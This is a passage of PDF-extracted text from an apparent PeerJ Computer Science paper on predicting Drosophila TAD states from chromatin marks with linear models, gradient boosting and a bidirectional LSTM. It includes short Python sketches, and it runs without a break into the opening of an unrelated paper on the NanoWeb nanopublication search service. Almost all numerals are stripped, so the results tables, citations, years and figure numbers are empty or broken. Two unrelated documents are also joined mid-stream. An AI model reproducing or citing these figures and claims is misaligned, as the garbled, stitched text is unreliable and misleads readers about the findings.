rnn. the first mark (‘all’) corresponds to scores of nns using the first dataset of chromatin marks features together, the last mark (‘const’) represents wmse using constant prediction. 
note that the lower the wmse value the better the quality of prediction. full-size doi: . /peerjcs. /fig- model demonstrated that the most valuable feature was chriz, while the weights of su(hw) and ctcf were the smallest. as expected, chriz factor was the top in the prioritization of the -features lr model. however, the next important features were histone marks h k me and h k me , supporting the hypothesis of histone modifications as drivers of tad folding in drosophila. we used two approaches for the feature selection of rnn: use-one feature and drop-one feature. when each single chromatin mark was used as the only feature of each bin of the rnn input sequence for training, the best scores were obtained for chriz and h k me (figs. , and ), similarly to the lr models results. when we dropped out one of the five features, we got scores that are almost equal to the wmse using the full dataset together. this does not hold for experiment with excluded chriz, where wmse increases. these results align with the outcome of use-one approach and while applying lr models. similar results were obtained while using the broader dataset. the results of applying the same approach of omitting each feature one by one using the second dataset of features allowed the evaluation of the biological impact of the features. the corresponding wmse rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure weighted mse using four out of five chromatin marks features together as the bilstm rnn input. each colour corresponds to the feature that was excluded from the input. note that the model is af- fected the most when chriz factor is dropped from features. full-size doi: . /peerjcs. /fig- scores are presented in fig. as well as the result of training the model on all features together. the results of omitting each feature one by one while using the second dataset of features are almost identical as we expected. it could be explained by the fact that most of the features are strongly correlated. tad state prediction models are transferable between cell lines of drosophila in order to explore the transferability of the results between various drosophila cell lines, we have applied the full pipeline for schneider- and kc cells from late embryos and dmbg -c (bg ) cells from the central nervous system of third-instar larvae. across all cell lines, the bilstm model has gained the best evaluation scores (table ). on average, the smallest errors were produced on the test set of the bg cell line. notably, the selected top features are robust between cell lines. the results of the usage of each feature separately for each of the cell lines can be found in fig. s . chriz was identified as the most influencing feature for schneider- and bg while being in the top four features for kc . histone modifications h k me and h k me gain very high scores on each dataset. however, ctcf was found in the top of the influencing chromatin marks only on the kc , while insulator su(hw) constantly scores almost the worst wmse across all cell lines. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure weighted mse on the test dataset while using each chromatin mark either as a single feature (blue line) or excluding it from the bilstm rnn input (yellow line). full-size doi: . /peerjcs. 
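the use-one and drop-one procedures applied above can be written down compactly; in the sketch below, train_and_score is a hypothetical helper that trains a model on the given matrices and returns the test wmse, standing in for the actual bilstm training code, and the array layout (samples first, chromatin marks last) is an assumption for illustration.

```python
# sketch of the use-one / drop-one feature-importance loops described in the text.
import numpy as np

def use_one_scores(x_train, y_train, x_test, y_test, feature_names, train_and_score):
    """train on a single chromatin mark at a time and record the test wmse."""
    scores = {}
    for j, name in enumerate(feature_names):
        # keep only feature j for every bin
        scores[name] = train_and_score(x_train[..., [j]], y_train,
                                       x_test[..., [j]], y_test)
    return scores

def drop_one_scores(x_train, y_train, x_test, y_test, feature_names, train_and_score):
    """zero out one chromatin mark at a time, keep all the others, record the test wmse."""
    scores = {}
    for j, name in enumerate(feature_names):
        xtr, xte = x_train.copy(), x_test.copy()
        xtr[..., j] = 0.0
        xte[..., j] = 0.0
        scores[name] = train_and_score(xtr, y_train, xte, y_test)
    return scores
```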
/fig- table weighted mse on cross-validation of all methods for each cell line and while using them to- gether. lower wmse orresponds to better quality of prediction. method schneider- kc dmbg -c all constant prediction . ± . . ± . . ± . . ± . linear regression . ± . . ± . . ± . . ± . linear regression + l . ± . . ± . . ± . . ± . linear regression + l . ± . . ± . . ± . . ± . linear regression + l + l . ± . . ± . . ± . . ± . gradient boosting . ± . . ± . . ± . . ± . bilstm units & bins . ± . . ± . . ± . . ± . the all-cell-lines model improves prediction for most cell lines finally, we tested the improvement of the prediction models that can be achieved by merging the information about all cell lines. for that, we merged all three cell lines as the input dataset and used the all-cell-lines model for the prediction on each cell line. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the gain of scores was the highest for schneider- and kc , while bg demonstrated a slight decline in the prediction quality. we also note that bilstm was less affected by the addition of cross-cell-line data among all models. in general, the quality of the prediction has mostly improved, suggesting the universality of the biological mechanisms of the tad formation between three cell lines (two embryonic and one neuronal) of drosophila. discussion here, we developed the hi-chip-ml framework for the prediction of chromatin folding patterns for a set of input epigenetic characteristics of the genome. using this framework, we provide the proof of concept that incorporation of information about the context of genomic regions is important for the tad status and spatial folding of genomic regions. our approach allows for diverse biological insights into the process of tad formation in drosophila, identified using the features importance analysis. firstly, we found that chromodomain protein chriz, or chromator (eggert, gortchakov & saumweber, ), might be an important player of the tad formation mechanism. recurrent neural networks that used only chriz as the input produced the highest scores among all rnns using single epigenetic marks (figs. , ). moreover, the removal of chriz strongly influenced the prediction scores when four out of five selected chip features were together (fig. ). all linear models assigned the highest regression weight to the chriz input signal. further, with the l regularization chriz was the only feature that the model selected for prediction. this chromodomain protein is known to be specific for the inter-bands of drosophila melanogaster chromosomes (chepelev et al., ), tad boundaries and the inter-tad regions (ulianov et al., ), while profiles of proteins that are typically over-represented in inter-bands (including chriz) correspond to tad boundaries in embryonic nuclei (zhimulev et al., ). the binding sites of insulator proteins chriz and beaf- are enriched at tad boundaries (hou et al., ; hug et al., ; ramírez et al., ; sexton et al., ). wang et al. ( ) reported the predictor of the boundaries based on the combination of beaf- and chriz. this might explain beaf- achieving the third rank of the predictability score. secondly, the application of the recurrent neural network using each of the selected chromatin marks features separately (fig. ) has revealed a strong predictive power of active histone modifications such as h k me . 
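a schematic of this merging step is given below; the per-cell-line arrays, their sizes, and their names are placeholders assumed only for illustration.

```python
# sketch: build the all-cell-lines training set by stacking the per-cell-line
# feature matrices (bins x marks) and target vectors along the bin axis.
import numpy as np

x_schneider, y_schneider = np.random.rand(500, 5), np.random.rand(500)  # placeholder arrays
x_kc, y_kc = np.random.rand(500, 5), np.random.rand(500)                # placeholder arrays
x_bg, y_bg = np.random.rand(500, 5), np.random.rand(500)                # placeholder arrays

x_all = np.concatenate([x_schneider, x_kc, x_bg], axis=0)
y_all = np.concatenate([y_schneider, y_kc, y_bg], axis=0)
# a single model trained on (x_all, y_all) can then be evaluated on each
# cell line separately and compared against the per-cell-line models.
```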
this result aligns with the fact that h k me defines the transcription factor binding regions in different cells, about % of transcription factor binding regions (tfbrs) on average overlap with h k me regions, and use h k me together with h k ac regions to improve the prediction of tfbrs (wang, li & hu, ). histone modifications h k me , h k ac, h k me , h k me , h k ac, and other active chromatin marks are also enriched in inter-tads and tad boundaries (ulianov et al., ). in addition, h k ac and h k me distinguish poised and active enhancers (barski et al., ; creyghton et al., ; rada-iglesias et al., ). thirdly, models using su(hw) and ctcf perform as expected given that, for the prediction of tad boundaries, the binding of insulator proteins su(hw) and ctcf have rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. performed worse than other chromatin marks (ulianov et al., ). in drosophila, the absence of strong enrichment of ctcf at tad boundaries and preferential location of su(hw) inside tads implies that ctcf- and su(hw)-dependent insulation is not a major determinant of tad boundaries. our results also demonstrate that the impact of su(hw) and ctcf is low for both proteins. thus, our framework not only accurately predicts positions of tads in the genome but also highlights epigenetic features relevant for the tad formation. importantly, the use of adjacent dna bins created a meaningful biological context and enabled the training of a comprehensive ml model, strongly improving the evaluation scores of the best rnn model. we note that there are few limitations to our approach. in particular, the resolution of our analysis is kb, while tad properties and tad-forming factors can be different at finer resolutions (wang et al., ; rowley et al., ; rowley et al., ). on the other hand, the use of coarse models allowed us to test the approach and select the best parameters while training the models multiple times efficiently. the training of the model for hi-c with the resolution up to bp presents a promising direction for future work, leading to the clarification of other factors’ roles in the formation of smaller tad boundaries that are beyond the resolution of our models. we also note that transitional gamma is just one of multiple measures of the tad state for a genomic region. we motivate the use of transitional gamma by the fact that it is a parameter-independent way of assessing tad prominence calculated for the entire map. this guarantees the incorporation of the information about the interactions of the whole chromosome at all genomic ranges, which is not the case for other approaches such as the insulation score (crane et al., ), d-score (stadhouders et al., ), and directionality index (dixon et al., ). on the other hand, the presented pipeline may be easily transferred to predict these scores as target values, which is an important direction for the extension of the work. here we selected features that had been reported to be associated with the chromatin structure. we note there might be other factors contributing to the tad formation that were not included in our analysis. the exploration of a broader set of cell types might be a promising direction for this research, as well as the integration of various biological features, such as raw dna sequence, to the presented models. we also anticipate promising outcomes of applying our approach to study the chromatin folding in various species except for drosophila. 
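as an illustration of what such an alternative target value looks like, the sketch below computes an insulation-score-like profile from a dense hi-c contact matrix; the window size and normalization details differ between published implementations (crane et al., ), so this is a schematic rather than the reference procedure.

```python
# rough sketch: for each bin, average the contacts that cross it within a
# fixed window; low values indicate insulating regions (candidate boundaries).
import numpy as np

def insulation_like_score(hic: np.ndarray, window: int = 10) -> np.ndarray:
    n = hic.shape[0]
    score = np.full(n, np.nan)
    for i in range(window, n - window):
        # contacts between the `window` bins upstream and downstream of bin i
        score[i] = hic[i - window:i, i + 1:i + window + 1].mean()
    # a common convention is log2 of the ratio to the chromosome-wide mean
    return np.log2(score / np.nanmean(score))

hic = np.random.rand(200, 200)
hic = (hic + hic.T) / 2           # toy symmetric matrix standing in for a hi-c map
profile = insulation_like_score(hic)
```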
the code is open-source and can be easily adapted to various related tasks. conclusions to sum up, we developed an approach for analysis of a set of chromatin marks as predictors of the tad state for a genomic locus. we demonstrate a strong empirical performance of linear regression, gradient boosting, and recurrent neural network prediction models for several cell lines and a number of chromatin marks. the selected set of chromatin marks can reliably predict the chromatin folding patterns in drosophila. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recurrent neural networks incorporate the information about epigenetic surroundings. the highest prediction scores were obtained by the models with the biologically interpretable input size of kb that aligns with the average tad size for the kb binning in drosophila. thus, we propose that the explicit accounting for linearly ordered bins is important for chromatin structure prediction. the top-influencing tad-forming factors of drosophila are chriz and histone modification h k me . the chromatin factors that influence the prediction most are stable across the cell lines, which suggests the universality of the biological mechanisms of tad formation for two embryonic and one neuronal drosophila cell line. on the other hand, the training of models on all cell lines simultaneously generally improves the prediction. the implemented pipeline called hi-chip-ml is open-source. the methods can be used to explore the d chromatin structure of various species and may be adapted to any similar biological problem and dataset. the code is freely available at: https://github.com/michalrozenwald/hi-chip-ml. additional information and declarations funding this study was supported by the russian science foundation, grant number - - , and skoltech fellowship in systems biology for aleksandra a. galitsyna. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . skoltech fellowship in systems biology. competing interests mikhail gelfand is an academic editor for peerj. grigory v. sapunov is employed by intento, inc. author contributions • michal b. rozenwald conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • aleksandra a. galitsyna conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • grigory v. sapunov, ekaterina e. khrameeva and mikhail s. gelfand conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/michalrozenwald/hi-chip-ml http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: . the code and the data are available at github: https://github.com/michalrozenwald/ hi-chip-ml . the chromatin marks are available at modencode using the following ids: # name schneider- kc dmbg -c chriz ctcf su(hw) beaf- cp gaf h k me h k me h k me h k me h k me h k ac h k me h k me h k me h k me h k ac rna-polymerase-ii . 
the hi-c data is available at ncbi geo: gse . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references barski a, cuddapah s, cui k, roh t-y, schones de, wang z, wei g, chepelev i, zhao k. . high-resolution profiling of histone methylations in the human genome. cell ( ): – doi . /j.cell. . . . belokopytova ps, nuriddinov ma, mozheiko ea, fishman d, fishman v. . quantitative prediction of enhancer–promoter interactions. genome research ( ): – doi . /gr. . . bkhetan za, plewczynski d. . three-dimensional epigenome statistical model: genome-wide chromatin looping prediction. scientific reports : doi . /s - - - . chathoth kt, zabet nr. . chromatin architecture reorganization during neu- ronal cell differentiation in drosophila genome. genome research ( ): – doi . /gr. . . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/michalrozenwald/hi-chip-ml https://github.com/michalrozenwald/hi-chip-ml https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. chepelev i, wei g, wangsa d, tang q, zhao k. . characterization of genome- wide enhancer-promoter interactions reveals co-expression of interacting genes and modes of higher order chromatin organization. cell research ( ): – doi . /cr. . . crane e, bian q, mccord rp, lajoie br, wheeler bs, ralston ej, uzawa s, dekker j, meyer bj. . condensin-driven remodelling of x chromosome topology during dosage compensation. nature ( ): – doi . /nature . creyghton mp, cheng aw, welstead gg, kooistra t, carey bw, steine ej, hanna j, lodato ma, frampton gm, sharp pa, boyer la, young ra, jaenisch r. . hi- stone h k ac separates active from poised enhancers and predicts developmental state. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . cristescu b-c, borsos z, lygeros j, martínez mr, rapsomaniki ma. . inference of the three-dimensional chromatin structure and its temporal behavior. arxiv preprint. arxiv: . . dixon jr, selvaraj s, yue f, kim a, li y, shen y, hu m, liu js, ren b. . topological domains in mammalian genomes identified by analysis of chromatin interactions. nature ( ): – doi . /nature . eggert h, gortchakov a, saumweber h. . identification of the drosophila interband-specific protein z as a dna-binding zinc-finger protein deter- mining chromosomal structure. journal of cell science ( ): – doi . /jcs. . eraslan g, avsec Ž, gagneur j, theis fj. . deep learning: new computational modelling techniques for genomics. nature reviews genetics ( ): – . farré p, heurteau a, cuvier o, emberly e. . dense neural networks for predicting chromatin conformation. bmc bioinformatics ( ): – doi . /s - - -z. filion gj, van bemmel jg, braunschweig u, talhout w, kind j, ward ld, brugman w, de castro ij, kerkhoven rm, bussemaker hj, van steensel b. . systematic protein location mapping reveals five principal chromatin types in drosophila cells. cell ( ): – doi . /j.cell. . . . filippova d, patro r, duggal g, kingsford c. . identification of alternative topological domains in chromatin. algorithms for molecular biology ( ): doi . / - - - . fudenberg g, kelley dr, pollard ks. . 
predicting d genome folding from dna sequence. biorxiv doi . / . gan m, li w, jiang r. . encontact: predicting enhancer-enhancer contacts using sequence-based deep learning model. peerj ( ): – doi . /peerj. . gan w, luo j, li yz, guo jl, zhu m, li ml. . a computational method to predict topologically associating domain boundaries combining histone marks and sequence information. bmc genomics ( ): – doi . /s - - - . gong y, lazaris c, sakellaropoulos t, lozano a, kambadur p, ntziachristos p, aifantis i, tsirigos a. . stratification of tad boundaries reveals preferential insulation rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cr. . http://dx.doi.org/ . /nature http://dx.doi.org/ . /pnas. http://arxiv.org/abs/ . http://dx.doi.org/ . /nature http://dx.doi.org/ . /jcs. http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. of super-enhancers by strong boundaries. nature communications ( ): doi . /s - - - . graves a. . supervised sequence labelling. in: supervised sequence labelling with recurrent neural networks. studies in computational intelligence, vol . berlin: springer, – doi . / - - - - _ . graves a, jaitly n, mohamed a-r. . hybrid speech recognition with deep bidi- rectional lstm. in: ieee workshop on automatic speech recognition and understanding. ieee, – . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – doi . /neco. . . . . hou c, li l, qin zs, corces vg. . gene density, transcription, and insulators con- tribute to the partition of the drosophila genome into physical domains. molecular cell ( ): – doi . /j.molcel. . . . hug cb, grimaldi ag, kruse k, vaquerizas jm. . chromatin architecture emerges during zygotic genome activation independent of transcription. cell ( ): – doi . /j.cell. . . . ibn-salem j, andrade-navarro ma. . c: computational chromosome conforma- tion capture by correlation of chip-seq at ctcf motifs. bmc genomics ( ): doi . /s - - - . jing f, zhang s, cao z, zhang s. . an integrative framework for combining se- quence and epigenomic data to predict transcription factor binding sites using deep learning. in: ieee/acm transactions on computational biology and bioinformatics. piscataway: ieee. johnson ds, mortazavi a, myers rm, wold b. . genome-wide mapping of in vivo protein-dna interactions. science ( ): – doi . /science. . kharchenko pv, alekseyenko aa, schwartz yb, minoda a, riddle nc, ernst j, sabo pj, larschan e, gorchakov aa, gu t, linder-basso d, plachetka a, shanower g, tolstorukov my, luquette lj, xi r, jung yl, park rw, bishop ep, canfield tk, sandstrom r, thurman re, macalpine dm, stamatoyannopoulos ja, kellis m, elgin scr, kuroda mi, pirrotta v, karpen gh, park pj. . compre- hensive analysis of the chromatin landscape in drosophila melanogaster. nature ( ): – doi . /nature . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . krijger phl, de laat w. . regulation of disease-associated gene expression in the d genome. nature reviews molecular cell biology ( ): – doi . /nrm. . . li z, dai z. . srhic: a deep learning model to enhance the resolution of hi-c data. frontiers in genetics : doi . /fgene. . . li w, wong wh, jiang r. . deeptact: predicting d chromatin contacts via boot- strapping deep learning. nucleic acids research ( ):e doi . /nar/gkz . rozenwald et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /j.molcel. . . http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /science. http://dx.doi.org/ . /nature http://arxiv.org/abs/ . http://dx.doi.org/ . /nrm. . http://dx.doi.org/ . /fgene. . http://dx.doi.org/ . /nar/gkz http://dx.doi.org/ . /peerj-cs. lieberman-aiden e, van berkum nl, williams l, imakaev m, ragoczy t, telling a, amit i, lajoie br, sabo pj, dorschner mo, sandstrom r, bernstein b, bender ma, groudine m, gnirke a, stamatoyannopoulos j, mirny la, lander es, dekker j. . comprehensive mapping of long-range interactions reveals folding principles of the human genome. science ( ): – doi . /science. . liu q, lv h, jiang r. . hicgan infers super resolution hi-c data with generative adversarial networks. bioinformatics ( ):i –i doi . /bioinformatics/btz . lupiáñez dg, spielmann m, mundlos s. . breaking tads: how alterations of chromatin domains result in disease. trends in genetics ( ): – doi . /j.tig. . . . martens ld, faust o, pirvan l, bihary d, samarajiwa sa. . identifying regulatory and spatial genomic architectural elements using cell type independent machine and deep learning models. biorxiv. doi . / . . . . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . rada-iglesias a, bajpai r, swigut t, brugmann sa, flynn ra, wysocka j. . a unique chromatin signature uncovers early developmental enhancers in humans. nature ( ): – doi . /nature . ramírez f, bhardwaj v, arrigoni l, lam kc, grüning ba, villaveces j, habermann b, akhtar a, manke t. . high-resolution tads reveal dna sequences underlying genome organization in flies. nature communications ( ): – doi . /s - - -w. rao ssp, huntley mh, durand nc, stamenova ek, bochkov id, robinson jt, sanborn al, machol i, omer ad, lander es, aiden el. . a d map of the human genome at kilobase resolution reveals principles of chromatin looping. cell ( ): – doi . /j.cell. . . . ren b, robert f, wyrick jj, aparicio o, jennings eg, simon i, zeitlinger j, schreiber j, hannett n, kanin e, volkert tl, wilson cj, bell sp, young ra. . genome- wide location and function of dna binding proteins. science ( ): – doi . /science. . . . rowley mj, lyu x, rana v, ando-kuri m, karns r, bosco g, corces vg. . condensin ii counteracts cohesin and rna polymerase ii in the establishment of d chromatin organization. cell reports ( ): – doi . /j.celrep. . . . rowley mj, nichols mh, lyu x, ando-kuri m, rivera ism, hermetz k, wang p, ruan y, corces vg. . evolutionarily conserved principles predict d chromatin organization. molecular cell ( ): – doi . /j.molcel. . . . schreiber j, libbrecht m, bilmes j, noble ws. . nucleotide sequence and dnasei sensitivity are predictive of d chromatin architecture. biorxiv. doi . / . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /science. http://dx.doi.org/ . /bioinformatics/btz http://dx.doi.org/ . /j.tig. . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /j.celrep. . . http://dx.doi.org/ . /j.molcel. . . http://dx.doi.org/ . 
/ http://dx.doi.org/ . /peerj-cs. schuster m, paliwal k. . bidirectional recurrent neural networks. ieee transactions on signal processing ( ): – doi . / . . schwessinger r, gosden m, downes d, brown r, telenius j, teh yw, lunter g, hughes jr. . deepc: predicting chromatin interactions using megabase scaled deep neural networks and transfer learning. biorxiv. doi . / . sexton t, yaffe e, kenigsberg e, bantignies f, leblanc b, hoichman m, par- rinello h, tanay a, cavalli g. . three-dimensional folding and func- tional organization principles of the drosophila genome. cell ( ): – doi . /j.cell. . . . singh s, yang y, poczos b, ma j. . predicting enhancer-promoter interaction from genomic sequence with deep neural networks. quantitative biology ( ): – doi . /s - - - . stadhouders r, vidal e, serra f, di stefano b, le dily f, quilez j, gomez a, collombet s, berenguer c, cuartero y, hecht j, filion gj, beato m, marti-renom ma, graf t. . transcription factors orchestrate dynamic interplay between genome topology and gene regulation during cell reprogramming. nature genetics ( ): – doi . /s - - - . trieu t, martinez-fundichely a, khurana e. . deepmilo: a deep learning approach to predict the impact of non-coding sequence variants on d chromatin structure. genome biology ( ): – doi . /s - - -x. ulianov sv, khrameeva ee, gavrilov aa, flyamer im, kos p, mikhaleva ea, penin aa, logacheva md, imakaev mv, chertovich a, gelfand ms, shevelyov yy, razin sv. . active chromatin and transcription play a key role in chromosome partitioning into topologically associating domains. genome research ( ): – doi . /gr. . . wang y, li x, hu h. . h k me reliably defines transcription factor binding regions in different cells. genomics ( ): – doi . /j.ygeno. . . . wang q, sun q, czajkowsky dm, shao z. . sub-kb hi-c in d. melanogaster reveals conserved characteristics of tads between insect and mammalian cells. nature communications ( ): – doi . /s - - -w. waterston r, celniker s, snyder m, white k, henikoff s, karpen g. . unlocking the secrets of the genome. nature ( ): – doi . / a. whalen s, truty rm, pollard ks. . enhancer–promoter interactions are encoded by complex genomic signatures on looping chromatin. nature genetics ( ): – doi . /ng. . yan x, su x. . linear regression analysis: theory and computing. singapore: world scientific. yuan y, shi y, su x, zou x, luo q, feng dd, cai w, han z-g. . cancer type pre- diction based on copy number aberration and chromatin d structure with convolu- tional neural networks. bmc genomics ( ): doi . /s - - -z. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /s - - -w http://dx.doi.org/ . / a http://dx.doi.org/ . /ng. http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /peerj-cs. zeng w, wang y, jiang r. . integrating distal and proximal information to predict gene expression via a densely connected convolutional neural network. bioinformat- ics ( ): – . zeng w, wu m, jiang r. . prediction of enhancer-promoter interactions via natural language processing. bmc genomics (suppl ): doi . /s - - - . zhimulev if, zykova ty, goncharov fp, khoroshko va, demakova ov, semeshin vf, pokholkova gv, boldyreva lv, demidova ds, babenko vn, demakov sa, belyaeva es. . 
genetic organization of interphase chromosome bands and interbands in drosophila melanogaster. plos one ( ): – doi . /journal.pone. . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. search, access, and explore life science nanopublications on the web search, access, and explore life science nanopublications on the web fabio giachelle, dennis dosso and gianmaria silvello department of information engineering, university of padua, padova, italy abstract nanopublications are resource description framework (rdf) graphs encoding scientific facts extracted from the literature and enriched with provenance and attribution information. there are millions of nanopublications currently available on the web, especially in the life science domain. nanopublications are thought to facilitate the discovery, exploration, and re-use of scientific facts. nevertheless, they are still not widely used by scientists outside specific circles; they are hard to find and rarely cited. we believe this is due to the lack of services to seek, find and understand nanopublications’ content. to this end, we present the nanoweb application to seamlessly search, access, explore, and re-use the nanopublications publicly available on the web. for the time being, nanoweb focuses on the life science domain where the vastest amount of nanopublications are available. it is a unified access point to the world of nanopublications enabling search over graph data, direct connections to evidence papers, and scientific curated databases, and visual and intuitive exploration of the relation network created by the encoded scientific facts. subjects data science, databases, digital libraries keywords nanopublication, scientific data, graph exploration, data search, data citation, data exploration, data access introduction the scientific world is swiftly becoming data-centric, embracing the principles of the so-called fourth paradigm of science (hey, tansley & tolle, ). data are at the center of scientific discovery as well as of scholarship and scholarly communication (borgman, ). the growing role of data is also witnessed by the ever-increasing importance of data science and related research fields concerning the search (chapman et al., ), provenance (cheney, chiticariu & tan, ), citation (silvello, ), re-use (wynholds et al., ), and exploration (rahman, jiang & nandi, ) of data. there is no “one size fits all” solution when it comes to data search, access, and re-use given the heterogeneity of data representations and models, interoperability issues, and domain-dependent requirements. in the context of scientific data, the nanopublication model has been proposed to target some of these issues (groth, gibson & velterop, ). nanopublications exploit the linked open data (lod) principles (bizer, heath & berners-lee, ) to represent scientific facts (assertions hereafter) as self-consistent, independent and machine-readable information tokens. a repository of nanopublications is to be thought of as an open and interconnected knowledge graph seamlessly integrated with the supporting scientific literature. nanopublications can be used to support how to cite this article giachelle f, dosso d, silvello g. . search, access, and explore life science nanopublications on the web. peerj comput. sci. :e doi . /peerj-cs. 
submitted june accepted november published february corresponding author gianmaria silvello, gianmaria.silvello@unipd.it academic editor arkaitz zubiaga additional information and declarations can be found on page doi . /peerj-cs. copyright giachelle et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:gianmaria.�silvello@�unipd.�it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ scientific claims, to explore scientific knowledge by exploiting machine intelligence and as entry points to scientific databases. hence, this model has been embraced by several scientific fields, especially in the life science domain, leading to the creation of more than ten million openly available nanopublications (kuhn et al., ). from the technical viewpoint, a nanopublication is a resource description framework (rdf) graph built around an assertion represented as a triple (subject-predicate-object) and usually extracted, manually or automatically, from a scientific publication. the nanopublication enriches the assertion with provenance and publication information. the rdf representation format enables interoperability and thus the re-use of data, whereas provenance and publication information eases authorship recognition, credit distribution, and citation. as an example taken from the biomedical domain, a nanopublication assertion about a gene-disease association is〈activin a receptor type a—gene-disease biomarker association—colorectal cancer〉, where activin a receptor type a is the subject, gene-disease biomarker association is the predicate and colorectal cancer is the object of the triple. this assertion is extracted from an article (campregher et al., ), which puts in relation the activin a receptor type a gene to the colorectal cancer and describes a drug—that is, mesalazine—that reduces mutations in transforming growth factor of the gene. in fig. a, we can see a snippet of the rdf nanopublication serialization described above. nanopublications are defined using the compact trig (https://www.w .org/tr/ trig/) syntax, that enables to define prefixes to avoid to re-write the same iris multiple times. in fig. a we used some prefixes within the nanopublication assertion, namely: dgn- gda, sio, miriam-gene and lld, that are specific of the life science domain. dgn-gda identifies a disgenet (http://rdf.disgenet.org/) gene-disease association; sio identifies a resource from semanticscience integrated ontology (sio) (https://github.com/maastrichtu-ids/ semanticscience), such as the type of a gene-disease association; miriam-gene identifies a gene in the national center for biotechnology information (ncbi) (https://www.ncbi. nlm.nih.gov/) database; lld identifies a resource from the linked life data (http://linkedlifedata.com/) platform for the biomedical domain. 
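to make the serialization format concrete, the following python sketch parses a toy nanopublication written in trig with rdflib and lists the triples of each named graph; the embedded snippet uses simplified, made-up uris and predicates rather than the exact ones shown in fig. a.

```python
# sketch: parse a simplified, made-up nanopublication in trig with rdflib
# and print the triples of each of its named graphs.
from rdflib import ConjunctiveGraph

trig_doc = """
@prefix : <http://example.org/np1#> .
@prefix np: <http://www.nanopub.org/nschema#> .

:head {
    :np1 a np:Nanopublication ;
         np:hasAssertion :assertion ;
         np:hasProvenance :provenance ;
         np:hasPublicationInfo :pubinfo .
}
:assertion {
    :gene-acvr2a :associatedWith :colorectal-cancer .
}
:provenance {
    :assertion :wasDerivedFrom :evidence-paper .
}
:pubinfo {
    :np1 :createdBy :some-author .
}
"""

g = ConjunctiveGraph()
g.parse(data=trig_doc, format="trig")

for graph in g.contexts():            # one context per named graph
    print(graph.identifier)
    for s, p, o in graph:
        print("   ", s, p, o)
```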
